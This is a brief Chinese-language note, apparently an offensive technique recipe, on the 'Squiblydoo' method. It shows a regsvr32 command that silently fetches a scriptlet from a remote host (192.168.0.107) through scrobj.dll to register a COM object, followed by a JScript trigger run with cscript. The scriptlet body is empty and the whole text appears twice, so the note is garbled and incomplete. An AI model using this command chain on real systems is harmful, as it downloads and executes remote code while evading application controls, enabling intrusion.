Squibledoo
创建1.sct
```xml <?XML version="1.0"?>
``` 创建COM对象 >regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll 触发 >cscript 1.js var test = new ActiveXObject("Component.TESTCB"); test.exec()
创建1.sct
```xml <?XML version="1.0"?>
``` 创建COM对象 >regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll 触发 >cscript 1.js var test = new ActiveXObject("Component.TESTCB"); test.exec()